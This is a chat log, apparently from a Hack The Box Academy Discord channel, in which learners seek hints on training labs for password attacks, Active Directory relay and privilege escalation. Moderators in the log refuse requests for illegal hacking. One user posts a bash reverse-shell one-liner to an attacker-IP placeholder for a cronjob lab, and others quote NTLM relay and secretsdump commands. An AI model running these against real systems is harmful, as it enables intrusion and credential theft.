#modules

and is php -S 0.0.0.0 the same?

man, i just joined the server and it says i ain't allowed to message anywhere

yes

#welcome #rules

and i'm TELLING YOU how to gain access to more of the server

my bad, thanks for telling though

Alr Ty marcielee

So php server and nc are the same thing

And they are both on device with no change to the outside

well php server spins up a php web server that would serve an index.php that does whatever you need to configure it to do

Can you please help me. Thank you for your advice.

Last question marcielee

What ip do I use with netcat?

the one top left or my ipconfig tun0

Hey guys, I’m stuck on the password attack module, the section on credential hunting

I just can’t find the password the the AD admin

when interacting with the private ips; tun0

Private ips u mean…?

my friend

learn basic networking

for the love of god

Sorry

||Try spidering for a term in the question using nxc.||

Try the introduction to networking module on HTB Academy.

Ok so for private ips I use tun0

For public ones?

do the networking fundamentals modules

I’ve spidered admin, domain and password

for public ones you don't use anything

So that’s not on scope

because they WON'T BE ABLE TO REACH YOU

Massive thank you to Doliec!

Sorry marcielee

||You're so close. Keep trying, use exact terms.||

I appreciate you explaining this to me

HTB has it set up to where the containers have very little internet access

I’m sorry if I’m costing you therapy

you owe me $20

I understand now

Thank u

Memecoins or discord nitro u choose

seadriscoins only ty

guys i tried everything can anyone help me

The answer isn't just cable... I don't really think I can help without just giving the answer away. Try rereading the section.

you literally had the answer in #general; i told you to drop the word cables as in don't use that in the answer

it is expecting the hyphenated word

if not it's expecting the singular form of the word

it say incorect

it's been a minute but it's one of those two

f-o c

to not give away answers

iknow fiber optic cable but is say incorect

the hyphenation is important

i tried everythink

fiber-optic cables

Did you just try f o? Also that's a spoiler.

f-o

yep

did you try the singular c with it

yep

what's the section name?

ik it's the introduction to networking module

but i don't feel like clicking through all the sections to find the page

network foundation

try capitalizing the f

that doesn't answer the section name

that's the module name

you had it right the first time then edited it for some reason

Components of a Network

looking at the answer i input: it's just "f-o" make sure you don't have any extra spaces in it

also tried sir

don't call me sir

I just checked, it's F-o.

try pressing CTRL+SHIFT+R and then entering the answer again

it's case insensitive

sry

i think when it first came out there was some weird case sensitivity issues

but do as Super said; refresh the page and try putting the answer in again

Thanks for the clarification.

Thank you guys for helping

it tried to be respectful

I just don't care for honorifics

When connecting to instance with my one machine through the OpenVPN file, the windows machine crashed 2 times. When I want to "click here to spawn the target system!", I got an error message explaining the VM cannot be started.

Other facing same issue ?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

ok

||Are you running printerbug on the DC, and ntlmrelay on the CA?||

thanks for answering, you could be more specific, why don't I understand you , both commands run them on my parrot machine, the attacking machine

@tall imp please be mindful of sharing passwords in your post. As it's a spoiler still. If you need more direct help and 0day is willing to take to dms do that

Not clear if you got it by now, but that one had me going for a while, too

https://discord.com/channels/473760315293696010/1340060493259341927

"hyphenated, singular, American spelling, no cable"

alright have gotten through most of the final assessment for the password attacks module. have no idea if i got it as expected but im at least on the jump host and found an admin users creds. ive tried a few things (wont spoil by going through it all) but feel like im hitting a road block. anyone around for a DM hint?

Just a question, is the Penetration Tester path recommended for someone who doesn't know anything about programming?

You don't have to know programming to start the Penetration Tester path. Programming can be a useful skill for quick scripting, but it is definitely not neccesary to get started. There isn't much programming anyway in the path.

But isn't it necessary to have a good programming background to start in the Red Team?

Red teaming and penetration testing are different. Yes, red teaming may require more programming skills to develop custom exploits.

so im back on linux fundamentals and one of the questions is "What is the inode number of the "shadow.bak" file in the "/var/backups" directory?"

in my terminal it shows

-rw------- 1 root shadow 1362 Sep 23 2020 shadow.bak

is the inode number not 1362?

no; that's it's size

there is an option with ls that lists the index number (inode) of a file

ls -li, right?

ye

T_T now its working

wasnt bringing up anything before

is there anyway to get more then one instance a day with a free acc im not old enought for a job and my parents think all hackers are bad so they wont get it for me

sometimes they give codes away that give you vip+ for a month or something in #giveaways if you keep your eye on it and enter

make sure to read the #rules and follow the instructions in #welcome to gain access to that and other channels

How old are you?

Hey is there something or someone from whom I get the answers in DM, in the case of stuck for long time..... ?

No one is going to tell you the answer per se, but if you ask someone they might help point you in the right direction

You can ask here, as long as you don't reveal contents of the module that are above tier 0. Otherwise just ask your question, say the module and section, and if you feel the need to take it to DM's you can ask. Keep in mind anyone who has done them before knows exactly what to do and doesn't really need you to reveal much info.

Ok

pls tell me theres no age requierment im 16

theres an age requierment

just checked the rules there's people who are 13 here it says it in in the nsfw rule im allowed to be here

yeah so like heres the thing right

@proud pine i think this is a issue for a mod to handle

sorry for the ping btw i was told to do that when someone broke ruels

This is for staff to handle.

oh alr

sorry rat for the ping

Can anyone kindly give me hint for Injection Attacks - Skill Assessment?
I got the internal server IP but I am not sure which port to look for. I tried with common ports, but it does not show any output on the PDF file.

Anyone else found AD attacks skills assessments 1 and 2 challenging? I’m finally almost done with the 2nd skill assessment. Got 4 left to answer. Kinda stuck though…hopefully my brain clicks tomorrow and I can finish. I’m stopping for the night though

am i allowed to ask a question about a fundamental module's question/answer here?

You can ask questions here as long as it doesn't spoil content from modules that are above tier 0 or from a skill assessment, and as long as you don't reveal the answer or how to get the answer.

ill try to be as vague as possible, basically when writing out my find command, it brings up a wall of files but if i added 2>/dev/null to the end of the same find command it brought up the one file i was looking for

that would be the expected behavior

if you don't pipe the command to 2>/dev/null it will display all the results in stdout, including permission denied errors or other errors. the 2>/dev/null part supresses the errors and only shows the real matches

LLM Output Skills assessment is difficult for me. Any clue that I should be looking for as the admin_key reply from the LLM chat is not real and not able to do injection here. I could be wrong

thank you, didnt know the last part was needed

to be clear, it's not 'needed'.. your match will still be in that mess of errors, but yeah it sure makes it a heck of a lot easier

yeah, i had to do some googling to find it but it just confused me, i dont think i saw anything about that in the module so far.

I'm sure it'll pop up somewhere, it's a very common thing to do

on the mysql footprinting module does anyone know how to fix

Plugin caching_sha2_password could not be loaded: /usr/lib64/mysql/plugin/caching_sha2_password.so: cannot open shared object file: No such file or directory

i was doing mariadb -u robin -p{omitted} -h <the IP>
got the self-signed certificate in certificate chain error, then moved to

mariadb -u robin -p{omitted} -h <the IP> --ssl-verify-server-cert=FALSE

and get the above plugin error (--skip_ssl does the same)

ive found a few sites online with how to fix it, but theyre all on the server side (or claim that doing -u <username> -p should automatically lower it to native_auth, which is not working even if i dont specify the password upfront)

(and yes it says mariadb instead of mysql but my system just warns me about typing mysql being deprecated and seems to be a symlink to mariadb anyway)

client version is mariadb from 11.8.2-MariaDB, client 15.2

Question about the Kerberos double hop section in the Active Directory module. Does this issue apply when using WinRM with password authentication, or only with Kerberos authentication. I would assume only when using Kerberos authentication right?

yes, the kerberos double hop problem only arises when using kerberos authentication. it's because the tickets issued by the kdc are for a specific service on a specific host.

Thanks! Yeah, just thought I'd make sure.

Try using mysql instead of mariadb to log in

like i said, my system just aliases them:

mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead

> ls -alh /usr/bin/mysql                                                                  
lrwxrwxrwx 1 root root 7 Jun  5 10:11 /usr/bin/mysql -> mariadb

Try using impacket-mysqlclient maybe?

Curious why it's being deprecated and what system you're using.

You can try sudo apt install mariadb --reinstall --fix-broken

If you're on a Debian/ubuntu

sorry, you could help me privately, it is that this part is costing me a lot, I only have doubts, and it gives me many failures, I only have the last question left, I already got the flag.txt of the pinkman user now I have to climb privileges to administrator

opensuse tumbleweed
i really should just wipe the partition and switch to kali or smth, it was just inertia and being slightly tired of debian-based distros lol

i seem to have fixed it by installing some combination of mariadb-connector-odbc, mariadb-tools and libmariadb_plugins

ive mostly gotten around stuff by building everything myself because nothing is in the package repo lol

@tall imp please do not include passwords in your request for help

as that would be a form of a spoiler

but I have not said any password, you have deleted my questions, for no reason, I have not mentioned any password at all.

How to hack people to destroy their computer??

yes it does contain a password domain/user:password

we don't do destructive hacking here see #rules and #welcome

destructive hacking is illegal

I am in password attack and specifically in Pass the Certificate
well, can someone help me, solve the question: What are the contents of flag.txt on Administrator's desktop? I don't want them to tell me any password or anything, I just want them to help me find the logic to get in as administrator, in principle I think the tools needed are: printerbug.py, ntlmrelayx ...

can someone help me privately please?

Can someone help me with the server-side attack module? I am in the 'exploiting SSTI - twig' section and the given code in the part where LFI in explained doesn't work (the server doesn't return any text). I also tried changing the directory, obfuscation and multiple payloads from PayloadsAllTheThings.

You are correct, combine the mentioned tools, before that do some information about what certificates are present on the target

Can someone help me with "Advanced Deserialization Attacks - Example 2: XML" I got the payload but needs to combine it with this type string and our payload, with dnSpy attached, we get an error because GetType returned null from section "Exploiting TeeTrove". Tried many variations and it will not hit the 'catch (Exception exception2)' to review the error.

In the ADCS module has someone else issues connecting to the ssh attack boxed (ESC5, ESC8, ESC11). I always get Too many authentication failures for this command ssh htb-student@10.129.205.205. I dont even have the chance to enter a password.

well, you gain knowledge by complete the path

Is anyone a hacker..

apart from that I don't know

at the moment there's no certification, it's safeto assume there will be one in the future, and with it there will be a dedicated channel for it like the other HTB certs

it's still a work in progress

they're still adding modules to the path

this is in collaboration with Google

in the future as well: don't dm people without asking

it's different subject matter

CBBH focuses more on the web end of things, CPTS focuses more on AD

Hello

Is anyone a hacker in this server?

Or can teach me how to?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

i also suggest reading #welcome and #rules

When you're given an attack host in the AD enum & attack module - is there any way to get a bigger resolution for the linux one? xfreerdp with /dynamic-resolution doesn't work

the windows one works fine for me, but the linux one is still small 😦

even when I maximize the screen, the desktop will remain small

Can somebody help me with the Skill Assessment from Intro to Assembly language module, Task 1 and 2? I've been stuck for a while there i just wanna complete the SOC Prereq path, im at 99.42% complete. Please somebody PM me

Is anyone elses Targets really flaky atm?

Connection keeps dropping

no

https://tenor.com/view/kylie-kylie-jenner-jenner-kardashian-kardashians-gif-15211307054878586001

change vpn region

Yo, does anyone know how to hack?

no @full wagon

i don't think there's native scaling

seems to be working now but must have had a funny 5 mins

ty tho

i answered your question earlier

Did u?

@full wagon - this is not a place for illegal requests, if that's all you want, just leave already

yes i linked to an article

very few people are willing to just teach people for free

chill

Step 1 if you wanna learn to hack. Read the #rules

you need to be able to put in the work to do the research yourself

Alr

ok bye now

#rules and #welcome tell you about the server

Bye

Alr thanks.

this channel is for the HTB academy learning modules found at https://academy.hackthebox.com

he's gone

LMAO

showed him the door

if you want someone to teach you it costs money or you can manipulate someone good at pin testing to become your friend "" and have him teach you

nvm hes gone

ah caught up

you don't manipulate people into being friends, that's how you get dropped off the face of the earth

anyway

not realy manipulate its more of a u want what he has

https://tenor.com/view/our-regular-programming-has-resumed-hunter-engel-agufish-back-to-our-regularly-scheduled-program-back-to-normal-gif-14307957518360577042

I hope to be done with this SA 2

then only thing left is AEN

we're dropping the conversation

you should give me an osint challenge 🙏

check out the main lab site for challenges

that's also not relevant to this channel :)

😭 ok

I think I remember the issue.. could it be that you are at the skill assessment? I don't remember exactly where I encountered it.
But if I remember correctly, my solution was to set the resolution manually, vecauseu /dynamic-resolution did not work

ahh let me try this 🙂

omg yes

hero!

nice

@fathom pendant -- the /size parameter works 😮 🥳

good to know

I'm in the password attack module / pass the certificate and I want to advise the administrator flag.txt ok ?:

for this the 2 tools to use is.

ntlmrelayx.py correct?

and then:
printerbug.py correct?

specifically following this syntax ?, would it be done like this ?:
python3 ntlmrelayx.py -t http://<IP_O_HOST_CA>/certsrv/certfnsh.asp --adcs --template KerberosAuth --http-port 80 --smb2support

I am doing the linux fundamentals and I am trying to connect to my target system but after a minute of being connected I keep getting kicked off with this message: client_loop: send disconnect: Connection reset

||You need to search for a slightly irregularly named keytab file. You can get its location by listing cronjobs.||

That's a spoiler, and that gives you all the information you need.

Good luck!

Hey there are some optional modules, after completing compulsory exercise, what is we ignore the and move on by simply typing DONE ?

I mean to say that, is it show harsh effect in exam ? Like it's a big deal or not ?

It's up to you. It's recommended for practice, but if you feel comfortable, you don't have to do them.

Ya, but what if it came in exam, these optional exercises are really difficult as compared to others it's takes time for me 🥺

^^

||It's in the same path as the file in the cronjob. That's probably this best hint I can give.||

See the discord message above too

*messages

@full moat please do not cross post in multiple channels, if you want to showcase your tool feel free to verify ( #welcome ) and use #resources-tools or #community-content

Hi anyone done with the API Attacks module i have qs about the Broken Authentication section

hii i am doing module number 2 GETTING started of cpts...there they show us how to fuzz nibblelog..but when i try to fuzz that ip ..i dont get any results...because of that i am not able to move forward..

in which module

i havent reached there yet

flag.txt should be the flag lol

even i am getting issue regarding fuzzing

i am not getting the results as they shown inthe module

can someone help me in clock ckew error in fluffy box

Hello Everyone, I was doing the Bash Scripting Module of HTB and in the Flow Control -Loop section I am unable to get the Answer of the Given Question. Can any one help

#boxes

flags may not always be HTB{}

or is it

:P

ignore the first couble characters

that's likely bad encoding because windows->Linux

sigh sure

hii i am doing module number 2 GETTING started of cpts...there they show us how to fuzz nibblelog..but when i try to fuzz that ip ..i dont get any results...because of that i am not able to move forward..

you should be fuzzing the ip of the spawned target, not of the example IP

they are often not the same

I am unable to Access OpenVAS Module on Port 8080 – Stuck and Need Help
I'm currently working on the OpenVAS module, but I’ve hit a roadblock and would really appreciate your assistance.
I have successfully connected to the openvpn. The target ip is also responding to my ping requests..
I’ve successfully connected to the target machine via SSH using the provided credentials, and I confirmed that the machine is reachable. However, I’m unable to access the OpenVAS web interface via https://<ip>:8080. The page just keeps loading and eventually times out.
In the module it's mentioned clearly that we have to do it.. but the page keeps loading... Pls. Help what to do?? Where is it I am doing weong

This is the module that I am referring to

I replaced the ip

This is the module page

and you're conencted to the vpn and spawned the target ip?

Yes

and visited https://ip:8080 ? sometimes it takes a minute to fully load in

Yess I did almost 10 times. Waited too long but nothing came.. just loading and loading ..can't reach this page

Anyone tried out the new password attacks structure yet? I'm just doing the pass the cert page as they added that in since I last checked.

dumping the NTLM hash of the admin user after going through each command line by line does not appear to give any output back apart from ... wondering if anyone has hit the same?

and I followed the commands exactly as written, didnt deviate.

strangely I get the b64 value of the cert rather than the cert being written to file as the module is written suggests:

I can convert with openssl to pfx easily but given this is a deviation it might also be why im failing to achieve the expected outcome... any thoughts?

Nvm looks intentional

@fathom pendant Hello I need some help, So i'm doing the Introductio to windows cli module, and i've come accross basics to Active directory, should i continue the module or switch to active directory module?

@forest tendon please don't tag people just out of the blue

just ask your qiuestion and be patient

someone will respond, no need to tag marcie for every question

I'd recommend keeping with the cli module cos in the AD module you'll need to know windows cli

any reason why impacket would provide a base64 value of the certificate for DC01 instead of writing it to a file? or is that nothing to worry about? I could convert with openssl as mentioned above but I don't seem to get the TGT later on so I'm concerned this is actually breaking the logic

I had the same thing - worked for me to convert it with openssl

Thanks Sparkling! I shall troubleshoot on then 😄

Thank you !

I'm looking for powershell and cmd practice learned from the windows cli module, although i dont know where to look for such machines

Hi, I’m doing the “Pass the Certificate” section of the Password Attacks module on HTB Academy.

I’m trying to trigger NTLM authentication using printerbug.py to my ntlmrelayx server on port 8080 (since 80 was in use). The relay server starts fine:

bash
Copiar
Editar
impacket-ntlmrelayx -t http://10.129.21.133/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication --http-port 8080
Then I run:

bash
Copiar
Editar
sudo python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:""@10.129.21.133 10.10.14.81:8080
But I get:

csharp
Copiar
Editar
[*] Host is offline. Skipping!
I’m using the lab VPN, target IP is 10.129.21.133, my IP is 10.10.14.81.

SMB port (445) is sometimes reachable, sometimes not.

Not sure if the Print Spooler (RPRN) is disabled.

Has anyone had this issue in this lab? Is there a better trigger than printerbug?

Thanks!

=~ looks wrong... look up how to check for a substring in bash

-# scratch that just realized that's a regex

Hi all, are there issues with pwnbox and targets? I'm on Attacking Enterprise Networks, which has been working fine until now. I keep getting connection timed out when ssh to target. Reset twice to no avail

https://unix.stackexchange.com/questions/119493/whats-the-difference-between-and
check this

I think the problem is somewhere else.
I just tried to run with "$var" == "value", and the result is still the same.

I have a little question about the password attack module. Exactly the creating custom wordlists part.

I get we should get used with how rules are created/applied but, why it doesn't talk at all about CuPP took, but the bruteforce module does? I had to stop that part of the module since I wasn't able to find it, but once I found this tool, i was able to do it.

what's the output of your script look like?

I would understand if it wasn't introduced in any module, but it would've been really useful if I got used to it on 7th module instead of deep into the path

I agree, I thought CuPP would've been taught in the new module but they completely skipped that. I ended up struggling on this lesson but ended exhausting my wordlist with anything and everything, finally got it. I disliked that lesson the most

They previously taught cupp before it was updated which I didn't understand at all

For real, the rest of the Password Attack module is fine for me, but that fkn Mark's password question had me stopping studying for like 3 days, got stuck into it so long.

Oh~~~

That's base64..

Decode it

@eager hare
remove the -n on the output line 😉

Password Attacks on the Network hunting section

Is this question broken? i was able to get like 6 passwords but all of them are wrong

One of the shares mendres has access to contains valid credentials of another domain user. What is their password?

No for this particular section the output is supposed to be base64

Hello, Im on the Crud API exercise in the Cracking into the box module and I think its broke.

Ive looked up the ip multi-ple times and am met with a blank screen

Thank you very much

reason being is that they want you to technically include the newline character at the end there which does contribute to the character count, you can see this in their hint.

guys hello how did you do cronjob abuse section in linux priv escalation?

What lesson are u on ghost

I modified backup.sh file and started nc on my kali but nothing happens

cronjob abuse

So you found the backup.sh good

I modified it even already using vim

Now you need to attack the script, add a one-liner reverse shell to it that forwards to your kali

Then use your listener, pickup the shell. Boom root access.

If you get stuck more just dm me I can help

ahh ah I understood I did a little mistake

one moment will try to fix it

bash -i >& /dev/tcp/<ATTACKER_IP>/443 0>&1 Here is the payload I used if that helps

yeah yeah

yh yh, goodluck 👍

hello, i can't connect to any practical exercices at the end of a module since aprox 30 minutes do you know if there is any problem with htb?

have you downloaded vpn file?

I'm trying to use Kerbrute for Attacking Active Directory and NTDS.dit and have terminated/reset my target twice. Does anyone know why this error might pop up? Am I supposed to find the proper port?

Is the domain name correct?

I found it, I'm gonna put that in erratum

It wanted "ILF.local" instead of "inlanefreight.local" but the lesson shows "inlanefreight", only reason I found it was Netexec giving me the proper domain

Unless it's intentionally showing that? I didn't see that. I lost a bit of time figuring that out

I am doing the vulnerability assessment module wherein in the nessus and openVas skills assessment.. whenever I go to the https://<ip>:8834 for nessus.. The page doesn't load.. it shows connection HAS TIMED OUT... I am connected to the VPN. I have tried both on my personal Kali Linux machine as well as On the Instance, but none of them worked.. Can anyone please help why is it not opening the remote machine??it's clearly mentioned in the walkthrough that I have to go to that https://ip:port to get the connection with machine... Pls.. helpp

On both my personal ma home as well as on the Instance, I was connected to the VPN

it's because firefox has issues with URLs that contain IPs, you can either try chrome or add it to ur /etc/hosts ``` echo
"IP vastest.com" >> etc/hosts and browse to http://vastest.com:PORT

Need help on SQLMAP Essentials Module, Bypassing Web Application Protections Section. Could not solve case 8, 10, 11.

most of them can be solved with either a single tamper script or 2-3 try between

or a combination of between + something else

try to find out what sqlmap is doing that maybe getting detected and look for a script that bypasses that

alright will check out, thank you 😭

I am stuck at the Password Attack:Credential Hunting in Network Shares. I execute the PowerHuntShares but I couldnot find any password for another domain user and administrator. Could you please help me with that

I have mapped it to vastest.com and checked it too(pic attached).. but then also when I visit the browser and search it, it just buffers and end up to connection has TIMED out.. I tried on Edge, Chrome, Firefox ..

@glacial minnow

I even tried ping vastest.com
It's working fine.. I am recieving packets

i got the same issue

are u connected to the vpn?

?

Yes

btw u should browse http not https

I am connected

I have tried both http as well as https

Why is it not opening🥲🥲.. I have been trying since yesterday

I tried finding vulnerabilities on the target using openVas on my Local computer.. but it's not giving proper results

ưhoai

Hey stuck in skill assessment of password attack module

Even I don't want to gain initial foothold........ Just give a hint

It's just show SSH is open i have username and password but it's not working

send where u stuck

Can anyone solve my problem? 😿

In DM ?

a little stuck on the password attack skill assessment… I’m currently trying to ||spider on FILE01 with nxc using proxychains,|| but I’m getting the feeling I’m missing something. I’m still only ||connected to JUMP01 as hw******|| but haven’t found creds for any other users

DM

It just show SSH is open and also have some creds but don't able to find right combination of user:pass

@safe phoenix hey brother i am also doing same how you get into foothold ? Like first Machine ?

Refer back to the section about generating possible usernames list based on what you know from the assessment prompt

But what about character ? Like how do you know how many characters ? I guess 12 ?

The section talks about a tool that takes a persons name as an argument. Try that approach

The tool name starts with ce__ ??

No, us******-an*******

Found bro thanks 🙏

hello, im in Information Gathering - Web Edition , subdomain bruteforcing , and im using dnsenum, i only found ns1,ns2 subdomains, and nothing else

Okay good 👍

Have you found something

Till now ?

Can anyone help with the 5th question on the pillaging section of windows privilege escalation cant seem to be able to move the sam and system off

Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.

Still stuck 😵‍💫

i was also stuck with this. haven't found time to try again yet cause of work. someone said to use ||snaffler||. i did try those and encounter some errors.

dm

hello,someone can help me with information gathering

I found something in the home dir in bash history file of the user jb....

But don't know where to use that creds 🥺

I tried the tree ysoserial approach but get never a reverse shell

Does someone hava the same issue

you can use those for the 2 host listed on the skill assessment page. you need to use proxychains though

hey guys,
I am a complete beginner and dont know how to start
I watched youtube videos but couldnt find right one

What are the contents of flag.txt on jpinkman's desktop?
https://academy.hackthebox.com/module/147/section/1335

need help

pls :((((

Hey please help me also :- how I move forward after gaining access to DMZ01

Password attacks - skill assessment !

Not getting anything

why not one of this subdomains are the correct answer

write PM please

PM ?

Means ?

DM please

I would recommend you to run:

ffuf -w /path/to/wordlist.txt -u http://target/ -h "Host: FUZZ.target.com"

Also, I'd recommend you using the seclists /Discovery/DNS/subdomains-top1million-xxx.txt lists, you can install them with

sudo apt install seclists

if you don't have them already.

After that, you should be getting the other subdomain you're not getting.

I am stuck at pcap Skill Assessment in Password Attacks. Anyone here for nudge?

I didn't finish that yet, but I could try to help you if you want :P Dm me

Stucked at "Password Attacks - Skill Assessment" while revision of modules, have done this before when there was 3 levels in Lab.

have explore all files, check bash_history but the Credentials that i got was not usable.. + run Lazagne + MimiPenguin as well. but still have not find any way to move from
File 01 : 172.16.119.10

I'm going crazy, someone has made this module, please write to me privately, because I really need help, I've been trying to solve this for 4 days and it just makes me mistake: https://academy.hackthebox.com/module/147/section/1335

Might wanna share the name and section name

Not just the link

Same the changes that was made on modules is good but making people crazy

i have leave that part.

need help please. Password Attacks -- Pass the Certificate

I'm going crazy,

if u find the solution, let me know as well.

What’s the problem?

@tall imp you can dm me 🙂

@brave scroll if you’re stuck on the same section, you can too

Making screenshot.

ey guys, i want to check a thing: its normal that in new password skills assessment i cant reach the 2 other hosts, and only i can reach the domain controller?

i dont know if its part of the lab or im having problems with the lab

Those machines are only reachable from inside their local network… have to find a way to get at them from the first machine

Hi I am learning a windows module facing some issues. Currently I am on a windows os using openvpn. So with rdp i can access the machine but when I am pinging the ip from cmd it says ip can't be reached. Has anyone faced this issue?

Need some help

hi guys, im stuck on web proxies when they ask me :

Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.

im like fuzziung with a lot of txt and nothing, i use common.txt from seclist, i use top 1 million and nthing. I found index.html blank page. Any tip, but dont tell me the solution 🙂

Try a stealth ping if that doesn’t work might want to send fragmented packets. Try sending smaller packets and wait for the host to respond to see what the TTL is doing.

for the password attacks module, final assessment. i have ssh to the first machine (dmz01) but from that session i cannot reach any internal machine, can't ping, can't netcat, can't scan.

I have reset my lab multiple times, can someone let me know if this is a system error vs an issue i am supposed to solve? pulling my hair out.

With telnet you can also try to see if for example RDP is open. Then think about how you can reach it

Tried still getting "request timed out"

But it's working fine on rdp

Hey , I need help. I am stuck with the password attack module , where we have to find the password of mark white by generating custom word list. I have been trying with cewl but I am getting 0 words of 12 length from there. Also with custom rules I am getting invalid rules error. Can anyone guide me a little bit

Google abit about combinatory attack in hashcat 🙂

Ok thanks will try it. Can you help me with a little more hint

Hi all, I am working on the skill assessment for LLM Output Attacks, and have been stuck on it for a while. Anyone that has done it that I could bounce some ideas?

Disabled the firewall in the pwnbox now it's working 🥲

anyone that could give me a nudge on skill assessment for LLM Output Attacks?

i just finish all the module and follow stucked in this section

Use https in your enumeration

It's a publicly routed domain

hi guys, im stuck on web proxies when they ask me :

Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.

im like fuzziung with a lot of txt and nothing, i use common.txt from seclist, i use top 1 million and nthing. I found index.html blank page. Any tip, but dont tell me the solution 🙂

And you're fuzzing for §filename§.html?

So the endpoint is /admin/§filename§.html

I’ve done some of the beginning if you’re on that part

omg i was fuzzing without the .thml i thought the intruder woudl get that ty guys

Nope intruder only does what you tell it to

sending you a dm

and yes, I am at the start of the skill assessment. I assume I have to get what is exposed to disclose information, but have not been able to get anything of value from it.

Anyone here who got past Password Attack PCAP part Skill Assessment and is available for a nudge?

Hm

The tool mentioned may work: I ended up using Wireshark and searching through protocols that may send info through plaintext

ok good to know 🙂, thanks!

Anyone can be my friend?

This isn't #general you've been told several times how to gain access to more of the server by following instructions in #welcome

Oh my name was breaking the rulesm.

Wow

Changing a name

When you can do @ the_whisperer2..

hey MarcieLee

Don't argue with moderation decisions. You can read #welcome and #rules

I did

bad time?

There's instructions in #welcome to link your htb account to the discord

Sorry to bother, i sent you a DM regarding your tutoring

wondering if you got it

I'm going crazy, something can help me overcome the password challenge specifically attacks the Pass Certificate session

please friends

I'm afraid hacking is bad

I joined the server because I was bored

hold on

ure main account is banned, right?

Yes

isnt ban evading against TOS?

It was ban evade

I terminated it

For reasons I cannot ssy

hacking itself is not bad

its like owning a knife, its only bad if you use it incorrectly

but knifes can be used to cook, or to cut things that you cant normally

Would you say your good at hacking

no

im trash at it

Cool

i can do it but almost everyone here is better than me

Same but my friend handles the dirty work while I bring in the trash

lets move to #general

I'm afraid I cang

Can't*

oh alr, see this channel is only for modules, you cant talk about anything else here

whats the issue

I can't talk on general it leads me to here

i can try to help

Instructions in #welcome

i understand if you dont want to tutor me btw, just questioning if u got it

Yes I got it

oh alr

il drop the topic

Guysss

The db leak

How do I find it

This isn't #general

Please, I need the help of someone who has made the full attack module, specifically in the Pass the Certificate section, someone please help me with this question: What are the contents of flag.txt on Administrator's desktop?

guys after the module networking can i start with 'Job rule path :
Penetration Tester" ?

The path assumes a base IT knowledge and strong understanding of computer and networking fundamentals. If you feel you have a good understanding of those basics, yeah I'd say go for it.

I understand networking well, but I haven't studied the fundamentals of Windows and Linux yet. Should I do that, or will I learn it there?

you can learn some stuff but a lot of what's covered in the path has an assumed knowledge of a lot of basics

i.e. they won't tell you what curl is doing

Hello guys

Can i have an advice

If it's related to the HTB modules on Academy then yes, this is the correct channel to ask. Otherwise read the #rules and follow the instructions in #welcome to gain access to a more appropriate channel.

I have a problem and need advice

Okay, that doesn't change anything about what I said. If it's module related ask, otherwise this isn't the right place.

Okay
Can i ask u in dm ?

No.

Question from module: What are the contents of flag.txt on jpinkman's desktop?

Hi, I am currently stuck on the section Pass the Certificate of the module Password Attacks I try to do a NTLM relay attack, Am I missing anything:

1. Got certificate by ntlmrelayx
[] GOT CERTIFICATE! ID 13
[] Writing PKCS#12 certificate to ./DC01$.pfx
[*] Certificate successfully written to file

2. Got kerberos ticket by gettgtpkinit.py
INFO:minikerberos:Requesting TGT
2025-06-20 17:30:35,690 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-20 17:30:35,690 minikerberos INFO b3b4d3742c8bac77965bcace2fe3239ee06ef13b9379cd5c5faa9a3b7e797362
INFO:minikerberos:b3b4d3742c8bac77965bcace2fe3239ee06ef13b9379cd5c5faa9a3b7e797362
2025-06-20 17:30:35,712 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file

3. Save as KRB5CCNAME variable
[!bash!]$ export KRB5CCNAME=/tmp/dc.ccache

Klist Output:
Ticket cache: FILE:/tmp/dc.ccache
Default principal: dc01$@INLANEFREIGHT.LOCAL

Valid starting Expires Service principal
06/20/2025 17:30:11 06/21/2025 03:30:11 krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL

4. Secretsdump output
python3 ../impacket/examples/secretsdump.py -k -no-pass -dc-ip 10.129.234.174 -just-dc-user krbtgt 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[] Cleaning up...
(Also Tried administrator and jpinkman, Nothing)

5. -use-vss also does not work:
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

You think which modules need to be completed to start the job role path: Penetration Tester?

Is there any issue on the XXE and IDOR section of Web Attacks module ?

nope

you mean in the questions ?

In the IDOR section the edit profile is not working and even the listing of documents other than the contracts option

if it aint working you could just reset the lab but i remember it working perfectly fine for me

Yes done the reset but still same issue

You need to resolve the domain controller hostname to its ip address.

IT WORKED THANKS A LOT

No problem, good luck!

You think which modules need to be completed to start the job role path: Penetration Tester?

It depends on your prior experience. You should understand the basics of networking and operating systems.

If you don't already, you can search for modules that cover those topics on HTB Academy.

during the Attacking Enterprise Networks module, the scoping document listed the /16 external range and *.inlanefreight.local subdomains... what if ip's in that range are not in those subdomains? are those out of scope? ( I am trying not to use the module in order to prep for exam so apologies if it clarifies that inside) i.e gettingstarted.htb. weird note though, after restarting the lab only the inlanefreight.local IP's are returning, the ones I associated with sites like gettingstarted.htb won't come back making me think there was a bug

I am doing the skills assessment for the web enumeration module. I have done the following:

• Found the web server that it is being hosted on.
• Found the Iana ID
  And now I'm trying to figure out the rest of the questions:
• admin API keys
• Email addresses
• API keys they'll be changing to

I have tried the following:

• FFUF in order to find subdomains -> didn't find anything.
• Gobuster to find subdomains -> didn't find anything.
• The webcrawler provided by HTB in order to find emails and such -> didn't find anything.
• robots.txt -> 404 not found
• Checked various .well-known directories according to provided important endpoints and the iana registry -> didn't find anything.
• nikto for service detection -> nothing but nginx
• wappalyzer for service detection -> nothing
• checked for wafs with wafw00f -> nothing

So I'm really unsure what to do at this point, just trying to find a site that is an actual site at this point rather than just a splash page saying "welcome to inlanefreight.htb"
